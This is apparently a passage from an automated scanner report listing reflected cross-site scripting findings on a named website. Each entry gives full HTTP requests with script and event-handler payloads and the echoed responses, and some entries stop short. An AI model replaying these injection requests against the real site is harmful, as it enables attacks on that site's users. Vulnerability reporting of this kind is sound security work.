2.691. http://www.resellerbase.com/communication/mobile-content/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 81a1d<a>65c1693d95f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/search.php?keyword=search...81a1d<a>65c1693d95f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php?keyword=search...81a1d<a>65c1693d95f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.692. http://www.resellerbase.com/communication/mobile-content/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 56a23<script>alert(1)</script>bb4dca2e67d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2&56a23<script>alert(1)</script>bb4dca2e67d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2&56a23<script>alert(1)</script>bb4dca2e67d=1 was not found on this server.</p>
...[SNIP]...

2.693. http://www.resellerbase.com/communication/mobile-content/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f0254<a>ff2aeec6039 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2f0254<a>ff2aeec6039 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/themes/search.php?keyword=search...&Submit3=Search&opt=2f0254<a>ff2aeec6039 was not found on this server.</p>
...[SNIP]...

2.694. http://www.resellerbase.com/communication/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3dded<script>alert(1)</script>497e6f90ae2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication3dded<script>alert(1)</script>497e6f90ae2/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication3dded<script>alert(1)</script>497e6f90ae2/search.php was not found on this server.</p>
...[SNIP]...

2.695. http://www.resellerbase.com/communication/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1491<script>alert(1)</script>05103c06a01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/search.phpb1491<script>alert(1)</script>05103c06a01 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.696. http://www.resellerbase.com/communication/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fd61c<a>a9a276c081b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/search.php?keyword=search...&Submit3=Searchfd61c<a>a9a276c081b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/search.php?keyword=search...&Submit3=Searchfd61c<a>a9a276c081b&opt=2 was not found on this server.</p>
...[SNIP]...

2.697. http://www.resellerbase.com/communication/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad80e"><img%20src%3da%20onerror%3dalert(1)>c81381518e4 was submitted in the cat parameter. This input was echoed as ad80e\"><img src=a onerror=alert(1)>c81381518e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /communication/search.php?cat=8ad80e"><img%20src%3da%20onerror%3dalert(1)>c81381518e4&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:39:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 30041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=8ad80e\"><img src=a onerror=alert(1)>c81381518e4">
...[SNIP]...

2.698. http://www.resellerbase.com/communication/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a66"><img%20src%3da%20onerror%3dalert(1)>5407328589c95c20b was submitted in the cat parameter. This input was echoed as 79a66\"><img src=a onerror=alert(1)>5407328589c95c20b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/search.php?cat=879a66"><img%20src%3da%20onerror%3dalert(1)>5407328589c95c20b&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:40:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=879a66\"><img src=a onerror=alert(1)>5407328589c95c20b">
...[SNIP]...

2.699. http://www.resellerbase.com/communication/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d24c7<a>3f1a53bde09 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/search.php?keyword=search...d24c7<a>3f1a53bde09&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/search.php?keyword=search...d24c7<a>3f1a53bde09&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.700. http://www.resellerbase.com/communication/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eaf84<script>alert(1)</script>c521409fd66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/search.php?eaf84<script>alert(1)</script>c521409fd66=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/search.php?eaf84<script>alert(1)</script>c521409fd66=1 was not found on this server.</p>
...[SNIP]...

2.701. http://www.resellerbase.com/communication/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 696a0<a>18c5d6f0bea was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/search.php?keyword=search...&Submit3=Search&opt=2696a0<a>18c5d6f0bea HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/search.php?keyword=search...&Submit3=Search&opt=2696a0<a>18c5d6f0bea was not found on this server.</p>
...[SNIP]...

2.702. http://www.resellerbase.com/communication/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f396<script>alert(1)</script>63888aa7d91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication7f396<script>alert(1)</script>63888aa7d91/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication7f396<script>alert(1)</script>63888aa7d91/themes/ was not found on this server.</p>
...[SNIP]...

2.703. http://www.resellerbase.com/communication/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38022<script>alert(1)</script>7656fe4ecf3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes38022<script>alert(1)</script>7656fe4ecf3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes38022<script>alert(1)</script>7656fe4ecf3/ was not found on this server.</p>
...[SNIP]...

2.704. http://www.resellerbase.com/communication/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 40970<script>alert(1)</script>8e2762366c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/?40970<script>alert(1)</script>8e2762366c0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.705. http://www.resellerbase.com/communication/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6396f<script>alert(1)</script>03e84233af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication6396f<script>alert(1)</script>03e84233af4/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication6396f<script>alert(1)</script>03e84233af4/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.706. http://www.resellerbase.com/communication/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ec34<script>alert(1)</script>2ede4c0ad68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes6ec34<script>alert(1)</script>2ede4c0ad68/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes6ec34<script>alert(1)</script>2ede4c0ad68/kosmos/ was not found on this server.</p>
...[SNIP]...

2.707. http://www.resellerbase.com/communication/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c275d<script>alert(1)</script>fc8b05923cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmosc275d<script>alert(1)</script>fc8b05923cb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmosc275d<script>alert(1)</script>fc8b05923cb/ was not found on this server.</p>
...[SNIP]...

2.708. http://www.resellerbase.com/communication/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d2750<script>alert(1)</script>681862e7da8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/?d2750<script>alert(1)</script>681862e7da8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/?d2750<script>alert(1)</script>681862e7da8=1 was not found on this server.</p>
...[SNIP]...

2.709. http://www.resellerbase.com/communication/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e70b1<script>alert(1)</script>ee0525367e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicatione70b1<script>alert(1)</script>ee0525367e/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicatione70b1<script>alert(1)</script>ee0525367e/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.710. http://www.resellerbase.com/communication/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af56e<script>alert(1)</script>f052d75a5be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesaf56e<script>alert(1)</script>f052d75a5be/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
